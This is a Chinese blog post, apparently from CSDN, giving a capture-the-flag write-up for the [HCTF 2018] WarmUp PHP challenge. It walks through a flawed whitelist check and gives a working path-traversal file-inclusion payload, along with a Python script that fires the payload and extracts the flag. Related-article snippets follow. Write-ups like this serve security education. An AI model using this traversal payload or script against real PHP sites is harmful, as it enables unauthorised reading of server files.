CTF_EXP05:BUUCTF CTFHUB [HCTF 2018] WarmUp

最新推荐文章于 2023-09-16 17:01:00 发布
最新推荐文章于 2023-09-16 17:01:00 发布
阅读量467 收藏
点赞数 1
分类专栏: CTF_EXP编写 文章标签: exp 安全 BUUCTF HCTF 2018 WarmUp
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_44037296/article/details/109151052
版权

CTF_EXP05:BUUCTF CTFHUB [HCTF 2018] WarmUp

启动靶机,打开环境:
在这里插入图片描述
根据提示是一道PHP代码审计的题目,查看网页源码:

<body>
    <!--source.php-->

发现提示的新页面,访问得到源码:
在这里插入图片描述
分析源码:
先看最后的一个if

    if (! empty($_REQUEST['file'])
        && is_string($_REQUEST['file'])
        && emmm::checkFile($_REQUEST['file'])
    ) {
        include $_REQUEST['file'];
        exit;
    } else {
        echo "<br><img src=\"https://i.loli.net/2018/11/01/5bdb0d93dc794.jpg\" />";
    }
  1. 传入的变量file不为空,并且为string类型,并执行checkFile()函数
  2. 三个条件为真则执行include
  3. 三个条件为假则输出滑稽

查看checkFile()函数:

public static function checkFile(&$page)
        {
            $whitelist = ["source"=>"source.php","hint"=>"hint.php"];
            if (! isset($page) || !is_string($page)) {
                echo "you can't see it";
                return false;
            }

            if (in_array($page, $whitelist)) {
                return true;
            }

            $_page = mb_substr(
                $page,
                0,
                mb_strpos($page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }

            $_page = urldecode($page);
            $_page = mb_substr(
                $_page,
                0,
                mb_strpos($_page . '?', '?')
            );
            if (in_array($_page, $whitelist)) {
                return true;
            }
            echo "you can't see it";
            return false;
        }
    }
  1. 有两个页面:source.phphint.php
  2. 四个if判断:
  • $page不为空或不为字符串,返回false
  • $page$whitelist数组中,返回true
  • mb_substr()函数截取字符串
  • mb_strpos()函数返回在$page?前的内容,没有则返回$page的值
  • 截取后$page$whitelist数组中,返回true
  • $page进行URL解码
  • 执行与之前相同的截取操作
  • 解码截取后$page$whitelist数组中,返回true

访问checkFile()函数中的hint.php页面:
在这里插入图片描述
提示了flag所在的路径,尝试访问:

/source.php?file=source.php?../ffffllllaaaagggg

因为checkFile()函数会匹配?前的内容是否在数组whitelist中,因为不知道在哪个目录,多次添加../得到flag
在这里插入图片描述
最终payload

/source.php?file=source.php?../../../../../ffffllllaaaagggg

EXP如下:
其中的UrlTest模块代码:

# -*- coding:utf-8 -*-
# name: Meng
# mail: 614886708@qq.com
# ctf_exp05:BUUCTF CTFHUB [HCTF 2018] WarmUp

import requests
import re
import UrlTest


class WarmUp:
    def __init__(self, url_input, platform_input):
        self.platform = platform_input
        self.error_num = 0
        self.payload = '/source.php?file=source.php?../../../../../ffffllllaaaagggg'
        self.url_list = ['', 'source.php', 'hint.php']  # 三个链接
        self.url = url_input
        self.flag = ''

    def num_test(self):
        # 设置获取flag只能重复30次
        for i in range(30):
            try:
                r = requests.get(self.url + self.payload)

                if self.platform == '1':
                    # 匹配ctfhub平台flag格式
                    self.flag = re.search(r'ctfhub\{.+\}', r.text).group()
                else:
                    # 匹配buuctf平台flag格式
                    self.flag = re.search(r'flag\{.+\}', r.text).group()

            except:
                self.error_num = i
                print('第 ' + str(i+1) + ' 次未获取到flag! 正在重试!')
            else:
                break

    def platform_test(self):
        for i in range(3):
            if self.platform not in ('1', '2'):
                print('平台选择有误!')
                self.platform = input('请重新选择平台:')
            else:
                break
        else:
            if self.platform not in ('1', '2'):
                print('平台选择失败! 退出程序!')
                return True

    def run(self):
        if self.platform_test():
            return

        self.url = UrlTest.url_test(self.url, self.url_list)
        self.num_test()     # flag获取

        if self.flag == '':
            print('已尝试30次!未获取到flag! 退出程序!')

        return self.flag


if __name__ == '__main__':
    print('ctf_exp05: BUUCTF CTFHUB [HCTF 2018] WarmUp')
    print('平台序号:1. ctfhub     2. buuctf')
    platform_input = input('请选择题目平台序号:')
    url_input = input('请输入题目链接:')
    print(WarmUp(url_input, platform_input).run())
    input()  # 防止退出cmd

输入平台编号(平台flag格式不一样)与题目链接,得到flag

在这里插入图片描述

Senimo_
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
ctfhub-web-warmup
m0_57954651的博客
11-20 452
mb_strpos()函数返回在$page中?前的内容,没有则返回$page的值。解码截取后$page在$whitelist数组中,返回true。截取后$page在$whitelist数组中,返回true。$page在$whitelist数组中,返回true。$page不为空或不为字符串,返回false。果然后面的代码不会白瞎 安心分析源码咯。查看源代码 提示source.php。对$page进行URL解码。中,因为不知道在哪个目录,多次添加。打开题目链接 是一张图。进入hint.php看看。
ctfhub warmup
weixin_63810302的博客
05-06 134
ctfhub warmup
攻防世界+BUUCTF几道reverse新手题(需要复写代码)
太阳照耀我走四方
07-15 495
1.攻防世界logmein 考点:简单的算法,及编写解题代码。 首先PE之后,是64位的。 然后IDA64位打开。 shift+F12 打开字符串窗口 CTRL+x 交叉引用地址 F5 反编译查看伪代码 这个题需要自己写一个脚本来跑一下。此处我用的c语言。 运行之后 得到。 总结:这个题在IDA反编译上没什么难度,shift+F12、CTRL + X 、F5 。但是在算法上,有点难度。需要自己写一 个程序来解密这个算法得到flag。 2.攻防世界no-strings-attached 考点:I
攻防世界-warmup
weixin_47346400的博客
02-27 157
参考wp传送门
BUUCTF
遇事不决冲冲冲
07-18 3660
[HCTF 2018]WarmUp 过程 1.找源代码 右键查看源代码或者F12发现提示 看到还有一个hint.php,再访问一下 2.分析源代码 if (! empty($_REQUEST['file']) && is_string($_REQUEST['file']) && emmm::checkFile($_REQUEST['file']) ) { include $_REQUEST['file'];
CTF_AWD_Platform:CTF 攻防对抗平台
05-03
开发目的即一款优秀的专用于比赛的CTF平台,它丰富的比赛内容,灵活的比赛模式以及各项人性化的功能模块满足了比赛举办者的所有要求。然而,同时并不局限于比赛的用途,使用者同样可以用来练习CTF解题和靶机攻防。...
ctf_walkthrough:捕获标志-演练
02-15
夺旗-演练在“捕获标志”(CTF)中,“标志”是隐藏在有目的漏洞的程序或网站中的秘密。 参赛者从其他参赛者(进攻/防守风格的CTF)或组织者那里窃取旗帜。 存在几种变体,包括在硬件设备中隐藏标志。 安全CTF通常被...
AWD_CTF_Platform:一个简单的AWD训练平台
05-13
CTF-AWD 训练平台 [TOC] 项目简介 一个简单的CTF-AWD平台,用于内部小型CTF对抗训练以及培训使用。 特点 docker化,简易部署 可部署在公网上,远程AWD攻防 训练环境可自定义扩展 基本使用方式 pre.py python pre.py ...
轩禹CTF_RSA工具3.6.1.zip
最新发布
01-29
CTF常用工具集
CTF_UNICON2020:netwars平台上托管的UNICON 2020 CTF编写
02-17
CTF_UNICON2020 netwars平台上托管的UNICON 2020 CTF编写UNICON >>> KnowYourPayloads.counterhack.com CTF 招聘人员下载了执行某种恶意软件的resume.doc之后,我们在端点上检测到恶意活动。 我们能够使该端点脱机,...
[HCTF 2018]WarmUp
2301_79773660的博客
09-16 47
[HCTF 2018]WarmUp 打开看到什么也没有提示,f12查看网页源代码 看到到了source.php,进行访问 看到了一大串的php代码,尝试进行解读 大致意思是满足三个条件会看到REQUEST['file'] if ( !empty($_REQUEST['file'])&& is_string($_REQUEST['file'])&& emmm:...
攻防世界-warmup
weixin_46784800的博客
11-12 773
攻防世界-warmup题 打开靶场后发现为一张滑稽的图片: 查看源代码: 输入source.php查看页面源代码,进行代码审计: 查看代码发现另外一个网址hint.php输入网址后发现提示flag不在这,在 ffffllllaaaagggg文件中 继续查看代码发现输入网址中必须要有参数file,且file的值必须是字符串,且通过checkFile函数的检验: if (! empty($_REQUEST['file']) && is_string($_REQUEST[
第八周所学
ANYOUZHEN的博客
01-16 4104
1.buuctf MD5 flag{admin1} 2.buuctf 一眼就解密 3.buuctf url编码 4. buuctf 看我回旋踢 5.buuctf 摩斯 6.buuctf password flag{zs19900315} 7.buuctf 8.buuctf rabbit flag{Cute_Rabbit} 9.buuctf 篱笆墙的影子 篱笆的意思是栅栏 10.buuctf ...
[BUUCTF] Web(一)
Manuffer的博客
10-08 458
BUUCTF web(一)
WEB_HCTF_2018_WarmUp
Pz_mstr's Blog
03-06 651
Categories web-代码审计 write up source code get source code http://eb22847d-9f8a-4ecf-b972-5ecebfcf5faf.node3.buuoj.cn/source.php <?php highlight_file(__FILE__); class emmm { publi...
攻防世界PWN进阶区(warmup
BurYiA的博客
02-03 1503
warmup 这是一个没有附件的题,看起来题目是要求我们fuzz了 nc连接上后可以发现有个输入点,并且还给了我们一个十六进制数,看起来是个地址 那首先根据这些我们可以先将fuzz函数写出来,分三种情况(不用他给的地址,用p32发送,用p64送) def fuzz(r, num, flag): payload = 'a' * num if flag==1: pa...
HCTF 2018 Warmup(函数理解)
a3320315的博客
11-07 3235
0x01 题目描述 先看hint 看url有file参数,感觉可能要用伪协议啥的,试了下,没出东西 扫一下目录,发现./source.php源码文件 源码如下 <?php class emmm { public static function checkFile(&$page) { $whitelist = [...
HCTF warm up
Yang_99的博客
05-23 493
HCTF warm up 进入题目发现一个滑稽,按F12发现有线索访问一下 <?php highlight_file(__FILE__); class emmm { public static function checkFile(&$page) { $whitelist = ["source"=>"source.php","hint"=>"hint.php"]; if (!
六一战队夺魁青少年CTF擂台赛2024_round1:Web与Pwn解题揭秘
青少年CTF擂台挑战赛2024第一轮(#round 1)是一项针对青少年的信息安全竞赛,参赛队伍sixone战队在本次比赛中取得了显著的成绩。比赛涵盖多种技术领域,包括Web应用安全(Web1到Web5)、逆向工程(Reverse1)、密码...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值